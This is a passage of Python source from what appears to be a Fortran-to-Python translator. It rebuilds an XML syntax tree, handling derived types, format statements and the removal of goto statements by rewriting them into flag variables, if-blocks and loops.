self.handle_tag_subroutine(root, current, parent, grandparent,
traverse)
elif root.tag == "arguments":
self.handle_tag_arguments(root, current, parent, grandparent,
traverse)
elif root.tag == "if":
self.handle_tag_if(root, current, parent, grandparent, traverse)
elif root.tag == "stop":
self.handle_tag_stop(root, current, parent, grandparent, traverse)
elif root.tag == "step":
self.handle_tag_step(root, current, parent, grandparent, traverse)
elif root.tag == "return":
self.handle_tag_return(root, current, parent, grandparent, traverse)
elif root.tag == "function":
self.handle_tag_function(root, current, parent, grandparent,
traverse)
elif root.tag == "use":
self.handle_tag_use(root, current, parent, grandparent, traverse)
elif root.tag == "module":
self.handle_tag_module(root, current, parent, grandparent, traverse)
elif root.tag == "initial-value":
self.handle_tag_initial_value(root, current, parent, grandparent,
traverse)
elif root.tag == "members":
self.handle_tag_members(root, current, parent, grandparent,
traverse)
elif root.tag == "only":
self.handle_tag_only(root, current, parent, grandparent, traverse)
elif root.tag == "length":
self.handle_tag_length(root, current, parent, grandparent, traverse)
elif root.tag == "saved-entity":
self.handle_tag_saved_entity(root, current, parent, grandparent,
traverse)
elif root.tag == "save-stmt":
self.handle_tag_save_statement(root, current, parent, grandparent,
traverse)
elif root.tag == "constants":
self.handle_tag_constants(root, current, parent, grandparent,
traverse)
elif root.tag == "constant":
self.handle_tag_constant(root, current, parent, grandparent,
traverse)
elif root.tag == "argument":
self.handle_tag_argument(root, current, parent, grandparent,
traverse)
elif root.tag == "interface":
self.handle_tag_interface(root, current, parent, grandparent,
traverse)
elif root.tag == "select":
self.handle_tag_select(root, current, parent, grandparent,
traverse)
elif root.tag == "case":
self.handle_tag_case(root, current, parent, grandparent,
traverse)
elif root.tag == "value-ranges":
self.handle_tag_value_ranges(root, current, parent, grandparent,
traverse)
elif root.tag == "value-range":
self.handle_tag_value_range(root, current, parent, grandparent,
traverse)
elif root.tag == "values":
self.handle_tag_values(root, current, parent, grandparent, traverse)
else:
assert (
False
), f"In parseXMLTree: <{root.tag}> passed from <{parent.tag}> " \
f"not supported"
#################################################################
# #
# RECONSTRUCTORS #
# #
#################################################################
def reconstruct_derived_type_declaration(self):
"""This function reconstructs the derived type
with the collected derived type declaration
elements in the handle_tag_declaration and
handle_tag_type.
Args:
None.
Returns:
None.
"""
if self.derived_type_var_holder_list:
size = ET.Element("")
is_dimension = False
# Since component-decl-list appears after component-decl,
# the program needs to iterate the list once first to
# pre-collect the variable counts.
counts = []
for elem in self.derived_type_var_holder_list:
if elem.tag == "component-decl-list":
counts.append(elem.attrib['count'])
# Initialize count to 0 for <variables> count attribute.
count = 0
dim = 0
# The 'component-decl-list__begin' tag is an indication
# that all the derived type member variable
# declarations will follow.
derived_type = ET.SubElement(self.parent_type, "derived-types")
literal_value = None
str_value = None
for elem in self.derived_type_var_holder_list:
if elem.tag == "intrinsic-type-spec":
keyword2 = ""
if elem.attrib['keyword2'] == "":
keyword2 = "none"
else:
keyword2 = elem.attrib['keyword2']
attributes = {
"hasKind": "false",
"hasLength": "false",
"name": elem.attrib['keyword1'],
"is_derived_type": str(self.is_derived_type),
"keyword2": keyword2,
}
newType = ET.SubElement(derived_type, "type", attributes)
if newType.attrib['name'].lower() == "character":
assert (
literal_value is not None
), "Literal value (String length) for character cannot be None."
newType.set("string_length", literal_value)
literal_value = None # Reset literal_value to None
elif elem.tag == "derived-type-spec":
attributes = {
"hasKind": "false",
"hasLength": "false",
"name": elem.attrib['typeName'],
"is_derived_type": str(self.is_derived_type),
"keyword2": "none",
}
newType = ET.SubElement(derived_type, "type", attributes)
elif (
elem.tag == "literal"
or elem.tag == "name"
):
value = elem
if elem.tag == "literal":
tag_name = "literal"
literal_value = elem.attrib['value']
else:
tag_name = "name"
elif elem.tag == "component-array-spec":
is_dimension = True
dim += 1
elif (
elem.tag == "component-decl-list__begin"
and not is_dimension
):
if len(counts) > count:
attr = {"count": counts[count]}
new_variables = ET.SubElement(
derived_type, "variables", attr
) # <variables _attribs_>
count += 1
elif elem.tag == "operation":
str_value = ""
for op in elem.iter():
if op.tag == "char-literal-constant":
str_value += op.attrib['str']
str_value = str_value.replace('"','')
elif elem.tag == "component-decl":
if not is_dimension:
var_attribs = {
"has_initial_value": elem.attrib[
"hasComponentInitialization"
],
"name": elem.attrib['id'],
"is_array": "false",
}
# Store variable name in the non array tracker
self.declared_non_array_vars.update(
{elem.attrib['id']: self.current_scope}
)
new_variable = ET.SubElement(
new_variables, "variable", var_attribs
) # <variable _attribs_>
if elem.attrib['hasComponentInitialization'] == "true":
init_value_attrib = ET.SubElement(
new_variable, "initial-value"
)
if str_value:
value.attrib['value'] = str_value
str_value = None
new_size = ET.SubElement(
init_value_attrib, tag_name, value.attrib
) # <initial-value _attribs_>
else:
total_number_of_arrays = len(self.derived_type_array_dimensions)
new_dimensions = ET.SubElement(
derived_type, "dimensions", {"count": "1"}
) # <dimensions count="1">
if self.derived_type_array_dimensions[dim]:
new_dimension = ET.SubElement(
new_dimensions, "dimension", {"type": "simple"}
) # <dimension type="simple">
has_lower_bound = False
new_range = ET.SubElement(new_dimension, "range")
num_of_dimensions = len(self.derived_type_array_dimensions[dim])
for s in range(0, num_of_dimensions):
value = self.derived_type_array_dimensions[dim][s]
if value.tag == "literal":
tag_name = "literal"
elif value.tag == "name":
tag_name = "name"
value.attrib["is_derived_type_ref"] = "true"
else:
pass
need_new_dimension = False
need_upper_bound = False
if (
len(self.derived_type_array_dimensions[dim]) == 1
or (not has_lower_bound
and ((s+1) < len(self.derived_type_array_dimensions[dim])
and value.attrib["dim-number"] != self.derived_type_array_dimensions[dim][s+1].attrib["dim-number"]))
):
if (
(s+1) < len(self.derived_type_array_dimensions[dim])
and value.attrib["dim-number"] != self.derived_type_array_dimensions[dim][s+1].attrib["dim-number"]
):
need_new_dimension = True
upper_bound_value = copy.copy(value)
upper_bound_tag_name = tag_name
tag_name = "literal"
value.tag = "literal"
value.attrib = {
"dim-number": value.attrib["dim-number"],
"type": "int",
"value": "0"
}
need_upper_bound = True
if not has_lower_bound:
bound = ET.SubElement(new_range, "lower-bound")
has_lower_bound = True
else:
bound = ET.SubElement(new_range, "upper-bound")
has_lower_bound = False
new_range_value = ET.SubElement(bound, tag_name, value.attrib)
if need_upper_bound:
bound = ET.SubElement(new_range, "upper-bound")
new_range_value = ET.SubElement(bound, upper_bound_tag_name, upper_bound_value.attrib)
has_lower_bound = False
if need_new_dimension:
new_dimension = ET.SubElement(
new_dimensions, "dimension", {"type": "simple"}
) # <dimension type="simple">
new_range = ET.SubElement(new_dimension, "range")
need_new_dimension = False
if len(counts) > count:
attr = {"count": counts[count]}
new_variables = ET.SubElement(
derived_type, "variables", attr
)
count += 1
var_attribs = {
"has_initial_value": elem.attrib[
"hasComponentInitialization"
],
"name": elem.attrib['id'],
"is_array": "true",
}
# Store variable name in the array tracker
self.declared_array_vars.update(
{elem.attrib['id']: self.current_scope}
)
new_variable = ET.SubElement(
new_variables, "variable", var_attribs
)
is_dimension = False
# Once one derived type was successfully constructed,
# clear all the elements of a derived type list
self.derived_type_var_holder_list.clear()
def reconstruct_derived_type_ref(self, current):
"""This function reconstruct the id into x.y.k form
from the messy looking id. One thing to notice is
that this new form was generated in the python syntax,
so it is a pre-process for translate.py and
even pyTranslate.py that
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
assert (
current.tag == "name"
), f"The tag <name> must be passed to reconstruct_derived_type_ref.\
Currently, it's {current.tag}."
# First the root <name> id gets the very first
# variable reference i.e. x in x.y.k (or x%y%k in Fortran syntax)
current.attrib['id'] = self.derived_type_var_holder_list[0]
if (
current.attrib['id'] in self.declared_array_vars
and self.declared_array_vars[current.attrib['id']]
== self.current_scope
):
current.attrib['hasSubscripts'] = "true"
current.attrib['is_array'] = "true"
else:
current.attrib['hasSubscripts'] = "false"
current.attrib['is_array'] = "false"
number_of_vars = len(self.derived_type_var_holder_list)
attributes = {}
parent_ref = current
self.derived_type_refs.append(parent_ref)
for var in range(1, number_of_vars):
variable_name = self.derived_type_var_holder_list[var]
attributes.update(current.attrib)
attributes['id'] = variable_name
if (
variable_name in self.declared_array_vars
and self.declared_array_vars[variable_name]
== self.current_scope
):
attributes['hasSubscripts'] = "true"
attributes['is_array'] = "true"
else:
attributes['is_array'] = "false"
# Create N (number_of_vars) number of new subElement
# under the root <name> for each referencing variable
reference_var = ET.SubElement(
parent_ref, "name", attributes
)
parent_ref = reference_var
self.derived_type_refs.append(parent_ref)
self.derived_type_var_holder_list.clear() # Clean up the list for re-use
def reconstruct_format(self, grandparent, traverse):
"""This function is for reconstructing the <format>
under the <statement> element.
The OFP XML nests formats under:
(1) statement
(2) declaration
(3) loop
tags; only the one declared under the statement is
correct. Therefore, those formats
declared under (2) and (3) will be extracted
and reconstructed to be nested under (1)
in this function.
Args:
grandparent (:obj: 'ET'): Grand parent element object.
traverse (int): Current traverse number.
Returns:
None.
"""
root_scope = ET.SubElement(self.current_body_scope, "statement")
for form in self.format_holder:
cur_elem = ET.SubElement(root_scope, form.tag, form.attrib)
self.parseXMLTree(
form, cur_elem, root_scope, grandparent, traverse
)
def reconstruct_derived_type_names(self, current):
"""This function reconstructs derived type
reference syntax tree. However, this functions is
actually a preprocessor for the real final reconstruction.
Args:
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
# Update reconstructed derived type references
assert (
self.is_derived_type_ref == True
), "'self.is_derived_type_ref' must be true"
numPartRef = int(current.attrib['numPartRef'])
for idx in range(1, len(self.derived_type_refs)):
self.derived_type_refs[idx].attrib.update(
{"numPartRef": str(numPartRef)}
)
# Re-initialize to original values
self.derived_type_refs.clear()
def reconstruct_name_element(self, cur_elem, current):
"""This function performs a final reconstruction of
derived type name element that was preprocessed by
'reconstruct_derived_type_names' function.
This function traverses the preprocessed name element
(including sub-elements) and splits & stores <name> and
<subscripts> into separate lists. Then, it combines
and reconstructs the two lists appropriately.
Args:
cur_elem (:obj: 'ET'): Newly generated element
for current element object.
current (:obj: 'ET'): Current element object.
Returns:
None.
"""
name_elements = [cur_elem]
# Remove the original <name> elements.
current.remove(cur_elem)
# Split & Store <name> element and <subscripts>.
subscripts_holder = []
for child in cur_elem:
if child.tag == "subscripts":
subscripts_holder.append(child)
else:
name_elements.append(child)
for third in child:
name_elements.append(third)
# Combine & Reconstruct <name> element.
subscript_num = 0
cur_elem = ET.SubElement(
current, name_elements[0].tag, name_elements[0].attrib
)
cur_elem.attrib['is_derived_type_ref'] = "true"
if cur_elem.attrib['hasSubscripts'] == "true":
cur_elem.append(subscripts_holder[subscript_num])
subscript_num += 1
numPartRef = int(cur_elem.attrib['numPartRef']) - 1
name_element = ET.Element("")
for idx in range(1, len(name_elements)):
name_elements[idx].attrib['numPartRef'] = str(numPartRef)
numPartRef -= 1
name_element = ET.SubElement(
cur_elem, name_elements[idx].tag, name_elements[idx].attrib
)
name_element.attrib['is_derived_type_ref'] = "true"
# In order to handle the nested subelements of <name>,
# update the cur_elem at each iteration.
cur_elem = name_element
if name_elements[idx].attrib['hasSubscripts'] == "true":
name_element.append(subscripts_holder[subscript_num])
subscript_num += 1
# Clean out the lists for recycling.
# This is not really needed as they are local lists,
# but just in case.
name_elements.clear()
subscripts_holder.clear()
self.need_reconstruct = False
def reconstruct_goto_after_label(
self, parent, traverse, reconstruct_target
):
"""This function gets called when goto appears
after the corresponding label and all necessary
statements are collected for the reconstruction.
Args:
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
traverse (int): A traverse counter.
reconstruct_target (dict): A dictionary that holds statements
for goto and label as well as the number of goto counter.
Return:
None.
"""
number_of_gotos = reconstruct_target['count-gotos']
stmts_follow_goto = reconstruct_target['stmts-follow-goto']
stmts_follow_label = reconstruct_target['stmts-follow-label']
header = [None]
self.check_conditional_goto(header, stmts_follow_goto)
# Correct boundaries of gotos in case of multiple
# nested gotos.
self.goto_boundary_corrector(
reconstruct_target, stmts_follow_goto,
stmts_follow_label
)
# Check for the case where goto and label are
# at different lexical levels
self.handle_in_outward_movement(stmts_follow_goto, stmts_follow_label, parent)
if not self.conditional_goto:
declared_goto_flag_num = []
self.generate_declaration_element(
parent, "goto_flag", number_of_gotos,
declared_goto_flag_num, traverse
)
# This variable is for storing a goto that may appear
# at the end of an if statement, because we want to extract it
# one scope out and place it right after
# the constructed if-statement
next_goto = []
reconstructed_goto_elem = []
for i in range(number_of_gotos):
# Constructor for statements if and statements nested
self.reconstruct_stmts_follow_goto_after_case(
header, parent, stmts_follow_goto, next_goto,
traverse, reconstructed_goto_elem, i
)
# Constructor for statements with L_i:stmt_n
self.reconstruct_stmts_follow_label_after_case(
stmts_follow_label, next_goto, reconstructed_goto_elem,
header, traverse, parent, i
)
# For an unconditional goto, generate a 'goto_flag_i = False'
# statement at the end of the reconstructed goto statement.
# Else, nothing gets printed, but set self.conditional_goto to False
if not self.conditional_goto:
statement = ET.SubElement(parent, "statement")
self.generate_assignment_element(statement, \
f"goto_flag_{i+1}", None, "literal", "false", traverse)
reconstructed_goto_elem.append(statement)
parent.remove(statement)
else:
self.conditional_goto = False
if len(reconstructed_goto_elem) > 1:
stmts_follow_label = reconstructed_goto_elem[1]
self.encapsulate_under_do_while = False
# next_goto holds another goto after the current label_after
# case label, which will encapsulate the reconstructed goto element
if next_goto:
self.reconstruct_next_goto(next_goto, reconstructed_goto_elem, parent)
# Set all holders and checkers (markers) to default
self.label_after = False
self.goto_under_if = False
self.reconstruct_after_case_now = False
self.reconstruction_for_after_done = True
self.goto_target_lbl_after.clear()
self.label_lbl_for_after.clear()
self.statements_to_reconstruct_after.clear()
def reconstruct_goto_before_label(
self, parent, traverse, reconstruct_target
):
"""This function gets called when goto appears
before the corresponding label and all necessary
statements are collected for the reconstruction.
Args:
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
traverse (int): A traverse counter.
reconstruct_target (dict): A dictionary that holds statements
for goto and label as well as the number of goto counter.
Return:
None.
"""
stmts_follow_label = reconstruct_target['stmts-follow-label']
number_of_gotos = reconstruct_target['count-gotos']
# This removes any statement that is a child statement of
# an if body and was separately re-added to the list.
self.remove_dup_stmt(stmts_follow_label)
# Declare label flag for loop condition
declared_label_flag_num = []
self.generate_declaration_element(
parent, "label_flag", number_of_gotos,
declared_label_flag_num, traverse
)
# Find the boundary from label to goto.
# Remove any statements that are not within the boundary.
goto_index_holder = []
target_label_lbl = [None]
statements_to_recover =\
self.boundary_identifier_for_backward_goto(
stmts_follow_label, goto_index_holder,
number_of_gotos, target_label_lbl
)
# In case multiple goto statements appear,
# slice them into N number of list objects.
# The location of a goto statement (inner to outer)
# is represented by the increment of the index
# i.e. [0]: innermost, [N]: Outermost
multiple_goto_stmts = []
self.multiple_goto_identifier(
goto_index_holder, multiple_goto_stmts,
stmts_follow_label
)
# Check whether there are nested label_after
# case goto statements. Handles one case
# at a time.
nested_gotos_exist =\
self.nested_forward_goto_identifier(multiple_goto_stmts)
# Generate loop ast
self.construct_goto_loop(
parent, reconstruct_target,
nested_gotos_exist, multiple_goto_stmts,
number_of_gotos, declared_label_flag_num,
traverse, target_label_lbl)
# Recover rest of the statements
self.statement_recovery(statements_to_recover, parent, traverse)
# Set all holders and checkers (markers) to default
self.label_before = False
self.reconstruct_before_case_now = False
self.reconstruct_for_before_done = True
self.label_lbl_for_before.clear()
self.statements_to_reconstruct_before['stmts-follow-label'] = []
self.statements_to_reconstruct_before['count-gotos'] = 0
def reconstruct_header(
self, temp_elem_holder, parent
):
"""This function is for reconstructing the oddly
generated header AST to have a uniform structure
with other multiary type operation nested headers.
Args:
temp_elem_holder (list): A temporary holder that
holds statements under header for swap.
parent (:obj: 'ET'): A parent ET object that the current element will be nested under.
Return:
None.
"""
# This operation is basically for switching
# the location of operator and 2nd operand,
# so the output syntax can have a common structure
# with other operation AST
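# Worked example of the swap below (operand and operator values are made
# up): an incoming order [name:a, name:b, equiv-op:.EQV.] is reordered to
# [name:a, .EQV., name:b], so the generated <operation type="multiary">
# matches the structure of other operation ASTs.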
op = temp_elem_holder.pop()
temp_elem_holder.insert(1, op)
# First create <operation> element
# Currently, only assume multiary reconstruction
operation = ET.SubElement(
parent, "operation", {"type":"multiary"}
)
for elem in temp_elem_holder:
if elem.tag == "name" or elem.tag == "literal":
operand = ET.SubElement(operation, "operand")
value = ET.SubElement(operand, elem.tag, elem.attrib)
else:
assert (
elem.tag == "equiv-operand__equiv-op"
), f"Tag must be 'equiv-operand__equiv-op'. Current: {elem.tag}."
operator = ET.SubElement(
operation, "operator", {"operator":elem.attrib['equivOp']}
)
parent.remove(elem)
def goto_boundary_corrector(self, reconstruct_target, stmts_follow_goto, stmts_follow_label):
"""This function is for correcting the boundaries of goto
statements in case multiple gotos are nested and
crossing each other.
Args:
reconstruct_target (dict): A dictionary that holds statements
for goto and label as well as the number of goto counter.
stmts_follow_goto (list): A list that holds statements
after goto statement.
stmts_follow_label (list): A list that holds statements
after label statements.
Return:
None.
"""
# If [0] <goto-stmt> is an inner scope statement of the [N-1]
# <goto-stmt> in the stmts_follow_goto, then we need to correct
# the boundary issue by moving the [N-1] element to
# the end of stmts_follow_label
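# Hedged illustration (labels are arbitrary): if stmts_follow_goto ends
# with a <goto-stmt> whose lbl matches the parent-goto of its first
# entry, that trailing goto belongs to an outer scope, so it is marked
# next-goto and moved to the end of stmts_follow_label instead.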
last_stmt = reconstruct_target['stmts-follow-goto'][-1]
if "goto-stmt" in last_stmt.attrib:
first_goto = reconstruct_target['stmts-follow-goto'][0]
if last_stmt.attrib['lbl'] == first_goto.attrib['parent-goto']:
last_goto = reconstruct_target['stmts-follow-goto'].pop()
last_goto.attrib['next-goto'] = "true"
stmts_follow_label.append(last_goto)
goto_and_label_stmts_after_goto = []
for stmt in stmts_follow_goto:
if "label" in stmt.attrib:
goto_and_label_stmts_after_goto.append(stmt.attrib['label'])
elif "goto-stmt" in stmt.attrib:
goto_and_label_stmts_after_goto.append(stmt.attrib['lbl'])
num_of_goto_and_label_after_label = 0
index = 0
for stmt in stmts_follow_label:
if (
"label" in stmt.attrib
or "goto-stmt" in stmt.attrib
):
num_of_goto_and_label_after_label += 1
# Since the first label-statement of
# stmts_follow_label is always a match
# for the first goto-statement in the
# stmts_follow_goto in the label_after case,
# remove the goto-move (label_before) case mark
if (
index == 0
and "goto-move" in stmt.attrib
):
del stmt.attrib['goto-move']
# -2 disregarding the first and last statements
num_of_goto_and_label_after_label -= 2
for i in range(num_of_goto_and_label_after_label):
stmt = stmts_follow_label.pop(-2)
stmts_follow_goto.append(stmt)
def reconstruct_stmts_follow_goto_after_case(
self, header, parent, stmts_follow_goto,
next_goto, traverse, reconstructed_goto_elem,
index
):
"""This function generates a new if statement to
nest statements that follow goto-stmt based on
condition or non-condition status to eliminate
goto.
Args:
next_goto (list): A list to hold next goto-stmt that may exist
within the boundary of current goto.
reconstructed_goto_elem (list): A list that will hold
reconstructed if statements.
header (list): A header that holds the conditional header.
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
stmts_follow_goto (list): A list that holds statements
within the boundary of currently handling goto.
traverse (int): A current traverse counter.
index (int): An index of goto.
Return:
None.
"""
if self.conditional_goto:
if not self.outward_move and not self.inward_move:
self.need_op_negation = True
if header[0] is not None:
self.generate_if_element(
header[0], parent, stmts_follow_goto, next_goto, True, None,
None, None, None, traverse, reconstructed_goto_elem
)
elif self.outward_move:
for stmt in stmts_follow_goto:
if "skip-collect" not in stmt.attrib:
cur_elem = ET.SubElement (parent, stmt.tag, stmt.attrib)
self.parseXMLTree(stmt, cur_elem, stmt, parent, traverse)
else:
assert (
False
), "Currently inward movement for goto is not being handled."
else:
self.generate_if_element(
None, parent, stmts_follow_goto, next_goto, True, "unary",
f"goto_flag_{index + 1}", None, ".not.", traverse,
reconstructed_goto_elem
)
if reconstructed_goto_elem:
stmts_follow_goto = reconstructed_goto_elem[0]
def handle_in_outward_movement(self, stmts_follow_goto, stmts_follow_label, parent):
"""This function checks the lexical level of goto and label.
Then, generate and add (remove) statements to the statement
holders, so they can be handled appropriately.
Args:
stmts_follow_goto (list): It holds all the statements
that appeared after the goto statement in the original
code.
stmts_follow_label (list): It holds all the statements
that appeared after the label statement in the original
code.
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
Returns:
None.
"""
body_levels = {}
for goto_stmt in stmts_follow_goto:
# If the statements are at different levels,
# we do not want to have them in the stmts_follow_goto,
# so check for such a case and remove anything that follows goto-stmt.
if (
self.outward_move
and ("generated-exit-stmt" not in goto_stmt.attrib
and "goto-stmt" not in goto_stmt.attrib)
):
stmts_follow_goto.remove(goto_stmt)
if "goto-stmt" in goto_stmt.attrib:
lbl = goto_stmt.attrib['lbl']
body_levels[lbl] = goto_stmt.attrib['body-level']
for label_stmt in stmts_follow_label:
if 'target-label-statement' in label_stmt.attrib:
label = label_stmt.attrib['label']
label_body_level = label_stmt.attrib['body-level']
# A goto-forward case where goto and label are
# located in different levels
if (
label in body_levels
and body_levels[label] != label_body_level
):
if self.body_level_rank[label_body_level]\
< self.body_level_rank[body_levels[label]]:
self.outward_move = True
# Since outward movement is simply adding exit (break) to
# the goto-stmt place, we have to create an <exit> statement,
# then append it to the stmts_follow_goto
statement = ET.SubElement(parent, "statement")
statement.attrib['generated-exit-stmt'] = "true"
exit = ET.SubElement(statement, "exit")
stmts_follow_goto.append(statement)
# We need to remove it from the parent as it was just
# a placeholder before being appended to the list
parent.remove(statement)
if label_body_level != "loop":
self.goto_under_loop = False
else:
self.goto_under_loop = True
def reconstruct_next_goto(self, next_goto, reconstructed_goto_elem, parent):
"""This function reconstruct a goto statement that appears
after the currently handling goto case. The default case
is that the next goto is a backward goto case, which
requires reconstruction by reconstruct_goto_before function.
Thus, this function prepares the ingredient for it.
Args:
next_goto (list): Holds statement and goto-stmt elements.
reconstructed_goto_elem (list): Holds reconstructed if statements
that were generated after eliminating the goto.
header (list): A list that holds the conditional header.
Return:
None.
"""
statement = ET.SubElement(
parent, next_goto[0]['statement'].tag,
next_goto[0]['statement'].attrib
)
goto_stmt = ET.SubElement(
statement, next_goto[0]['goto-stmt'].tag,
next_goto[0]['goto-stmt'].attrib
)
if (
reconstructed_goto_elem
and reconstructed_goto_elem[0].attrib['label']
== goto_stmt.attrib['target_label']
):
for stmt in reconstructed_goto_elem:
self.statements_to_reconstruct_before['stmts-follow-label'].append(stmt)
self.statements_to_reconstruct_before['stmts-follow-label'].append(statement)
if self.statements_to_reconstruct_before['count-gotos'] < 1:
self.statements_to_reconstruct_before['count-gotos'] = 1
self.reconstruct_before_case_now = True
self.reconstruction_for_before_done = False
def check_conditional_goto(self, header, stmts_follow_goto):
"""This function checks whether the goto is conditional
or unconditional. If it's conditional, it extracts
the conditional operation (header).
Args:
header (list): A list that holds the conditional header.
stmts_follow_goto (list): It holds all the statements
that appeared after the goto statement in the original
code.
Returns:
None.
"""
# Check for the status whether current <goto-stmt> is
# conditional. If yes, only extract the header (condition)
# and remove the if statement AST from the tree.
uniq_code = None
for stmt in stmts_follow_goto:
if (
stmt.tag == "statement"
and "goto-stmt" in stmt.attrib
and "conditional-goto-stmt" in stmt.attrib
):
uniq_code = stmt.attrib['code']
self.conditional_goto = True
if uniq_code in self.conditional_op:
header[0] = self.conditional_op[uniq_code]
def reconstruct_stmts_follow_label_after_case(
self, stmts_follow_label, next_goto,
reconstructed_goto_elem, header, traverse,
parent, index
):
"""This function generates a new statements to
nest statements that follow label based on
condition or non-condition status to eliminate
goto.
Args:
next_goto (list): A list to hold next goto-stmt that may exist
within the boundary of current goto.
reconstructed_goto_elem (list): A list that will hold
reconstructed if statements.
header (list): A list that holds the conditional header.
parent (:obj: 'ET'): A parent ET object that current
element will be nested under.
stmts_follow_label (list): A list that holds statements
follow label statement for currently handling goto.
traverse (int): A current traverse counter.
index (int): An index of goto.
Return:
None.
"""
for stmt in stmts_follow_label:
if len(stmt) > 0:
# A case where another goto-stmt appears after the current label
if "goto-stmt" in stmt.attrib:
goto_stmt = {}
goto_stmt['statement'] = stmt
for child in stmt:
if child.attrib['target_label'] in self.goto_target_lbl_before:
goto_stmt['statement'].attrib['goto-move'] = "true"
if (
child.attrib['target_label'] not in self.goto_target_lbl_after
and "goto-move" in goto_stmt['statement']
):
del goto_stmt['statement'].attrib['goto-move']
goto_stmt['goto-stmt'] = child
next_goto.append(goto_stmt)
else:
# A case where both goto and label are under the same level
if not self.outward_move and not self.inward_move:
reconstructed_goto_elem.append(stmt)
if not self.encapsulate_under_do_while:
statement = ET.SubElement(parent, stmt.tag, stmt.attrib)
for child in stmt:
cur_elem = ET.SubElement(statement, child.tag, child.attrib)
if len(child) > 0:
self.parseXMLTree(child, cur_elem, statement, parent, traverse)
# A case where outward movement goto handling is needed
elif self.outward_move:
label_body_level = self.body_elem_holder[stmt.attrib['body-level']]
# If the goto is conditional but appears under an else, then
# there is no header operation. Thus, we simply declare a new boolean
# variable, as for an unconditional goto, then use that variable to
# construct a new if statement and nest the statements under the label.
if self.goto_under_else:
number_of_gotos = int(self.statements_to_reconstruct_after['count-gotos'])
declared_goto_flag_num = []
self.generate_declaration_element(
label_body_level, "goto_flag", number_of_gotos,
declared_goto_flag_num, traverse
)
self.generate_if_element(
None, label_body_level, stmts_follow_label, next_goto, False, None,
f"goto_flag_{index + 1}", None, None, traverse,
reconstructed_goto_elem
)
else:
self.generate_if_element(
header[0], label_body_level, stmts_follow_label, next_goto, True, None,
None, None, None, traverse, reconstructed_goto_elem
)
# A case where inward movement goto handling is needed
else:
pass
def restruct_declaration(self, elem_declaration, parent):
"""This function is to restructure declaration to have an uniform
xml structure."""
declaration = ET.SubElement(
parent, elem_declaration.tag, elem_declaration.attrib
)
for child in elem_declaration:
subelem = ET.SubElement(
declaration, child.tag, child.attrib
)
self.generate_element(child, subelem)
if child.tag == "type":
dimensions = ET.SubElement(
declaration,
self.dimensions_holder.tag,
self.dimensions_holder.attrib
)
self.handle_tag_dimensions(self.dimensions_holder, dimensions, parent, parent, 1)
def generate_element(self, current_elem, parent_elem):
"""This function is to traverse the existing xml and generate
a new copy to the given parent element - This is a recursive function."""
for child in current_elem:
if len(child) > 0 or child.text:
elem = ET.SubElement(
parent_elem, child.tag, child.attrib
)
self.generate_element(child, elem)
else:
subelem = ET.SubElement(
parent_elem, child.tag, child.attrib
)
if subelem.tag == "variable":
subelem.attrib['is_array'] = "true"
#################################################################
# #
# ELEMENT GENERATORS #
# #
#################################################################
def generate_declaration_element(
self, parent, default_name, number_of_gotos,
declared_flag_num, traverse
):
"""A flag declaration and assignment xml generation.
This will generate N number of label_flag_i or goto_i,
where N is the number of gotos in the Fortran code
and i is the number assigned to the flag
Args:
parent (:obj: 'ET'): Parent element object.
default_name (str): A default name given for
new variable.
number_of_gotos (int): A number of gotos. Amount
of variables will be generated based on this number.
declared_flag_num (list): A list to hold the numbers
of the declared variables (flags).
traverse (int): A current traverse counter.
Return:
None.
"""
# Declaration
specification_attribs = {
"declaration": "1",
"implicit": "1",
"imports": "0",
"uses": "0"
}
specification_elem = ET.SubElement(
parent, "specification", specification_attribs
)
declaration_elem = ET.SubElement(
specification_elem, "declaration", {"type": "variable"}
)
type_attribs = {
"hasKind": "false",
"hasLength": "false",
"is_derived_type": "False",
"keyword2": "none",
"name": "logical",
}
type_elem = ET.SubElement(
declaration_elem, "type", type_attribs
)
variables_elem = ET.SubElement(
declaration_elem,
"variables",
{"count": str(number_of_gotos)}
)
variable_attribs = {
"hasArraySpec": "false",
"hasCharLength": "false",
"hasCoarraySpec": "false",
"hasInitialValue": "false",
"hasInitialization": "false",
"is_array": "false",
}
for flag in range(number_of_gotos):
flag_num = flag + 1
if default_name == "label_flag":
if flag_num in self.declared_label_flags:
flag_num = self.declared_label_flags[-1] + 1
if default_name == "goto_flag":
if flag_num in self.declared_goto_flags:
flag_num = self.declared_goto_flags[-1] + 1
self.declared_label_flags.append(flag_num)
declared_flag_num.append(flag_num)
variable_attribs['id'] = f"{default_name}_{flag_num}"
variable_attribs['name'] = f"{default_name}_{flag_num}"
variable_elem = ET.SubElement(
variables_elem, "variable", variable_attribs
)
# Assignment
for flag in range(number_of_gotos):
flag_num = declared_flag_num[flag]
declared_flag_num.append(flag_num)
statement_elem = ET.SubElement(parent, "statement")
self.generate_assignment_element(
statement_elem, f"{default_name}_{flag_num}", None, "literal",
"true", traverse
)
def generate_assignment_element(
self, parent, name_id, condition, value_type, value, traverse
):
"""This is a function for generating new assignment element xml
for goto reconstruction.
Args:
parent (:obj: 'ET'): Parent element object.
name_id (str): Name of a target variable.
value_type (str): Type of value that will be assigned.
traverse (int): A current traverse counter.
Returns:
None.
"""
assignment_elem = ET.SubElement(parent, "assignment")
target_elem = ET.SubElement(assignment_elem, "target")
self.generate_name_element(
target_elem, "false", name_id, "false", "1", "variable"
)
value_elem = ET.SubElement(assignment_elem, "value")
# Unconditional goto has default values of literal as below
if value_type == "literal":
assert (
condition is None
), "Literal type assignment must not hold condition element."
literal_elem = ET.SubElement(
value_elem, "literal", {"type": "bool", "value": value}
)
# Conditional goto has dynamic values of operation
else:
assert (
condition is not None
), "Conditional <goto-stmt> assignment must be passed with operation."
unique_code = parent.attrib['code']
for stmt in condition[unique_code]:
if stmt.tag == "operation":
condition_op = stmt
operation_elem = ET.SubElement(
value_elem, condition_op.tag, condition_op.attrib
)
self.parseXMLTree(
condition_op, operation_elem,
value_elem, assignment_elem,
traverse
)
def generate_operation_element(self, parent, op_type, operator, name):
"""This is a function for generating new operation element and
its nested subelements with the passes arguments.
Currently, it generates only a unary operation syntax only.
It may require update in the future.
Args:
parent (:obj: 'ET'): Parent element object.
op_type (str): Operation type.
operator (str): Operator.
name (str): Name of a variable for new element.
Returns:
None.
"""
operation_elem = ET.SubElement(parent, "operation", {"type": op_type})
operator_elem = ET.SubElement(operation_elem, "operator",
